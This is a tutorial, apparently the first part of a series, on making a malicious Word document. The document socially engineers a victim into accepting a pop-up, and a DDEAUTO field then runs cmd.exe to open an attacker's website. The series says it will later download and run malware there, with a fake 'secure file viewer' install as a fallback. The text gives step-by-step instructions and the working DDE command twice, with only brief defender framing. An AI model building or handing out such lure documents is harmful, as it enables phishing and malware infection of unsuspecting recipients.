In this new series we are going to be making a malicious Word document, which will connect to our malicious site and automatically run malicious code to give us access to the victim. It also gives us a fallback, where the user is prompted to install a secure file viewer should our automatic code not run. This gives us 2 chances to infect the victim machine.
Office documents allow us to execute code, in the same way as a website would, so using some simple scripting we can create a document which, when opened, automatically prompts the user to click a pop up, and then automatically connects to our malicious website to download and run malware.
If you are a defender, the most important thing to understand is how attacks like this work, so you know what you are looking out for. With that in mind, let’s go make some malware.
In part one we are only creating the document itself, adding some images and text to try to socially engineer the victim user into thinking it is legitimate and clicking the pop up box. We will also test that the script works and opens a website. In this demo we will be using http://legitimate.website.com, which is just a test site for this demo, so you will need a different website to open. At this point we are just testing that the script opens a web page, so if you don’t have a website you can just use https://google.com.
What you need:
- Microsoft Word
- Some free security images downloaded from the internet
- Some made up text to put in the document
- A Windows pop up screenshot
- This piece of code: DDEAUTO c:\\windows\\system32\\cmd.exe “/kstart iexplore http://<yoursite> “
- Less than 5 minutes.
Open up Word and create a simple looking document which will tempt your victim to accept the pop up when they see it. Pop some images in, and be creative with the text in the document. Ours is shown below.
Now we need to insert the script which will open the website when the pop up is clicked.
Move the cursor down the page and then click “Insert” from the ribbon menu, then “Quick Parts”, then “Field” from the drop-down menu. Ensure “=(Formula)” is selected, then click OK.
Then you should see the below in your document. This is our formula field.
Right click and choose “Toggle Field Code”.
Then you’ll see this:
Clear the code and insert our code as shown:
DDEAUTO c:\\windows\\system32\\cmd.exe “/kstart iexplore http://<yoursite> “
Save and close the document, then to test, reopen it on your machine. If the website opens as in the video you are ready to move on to the next step.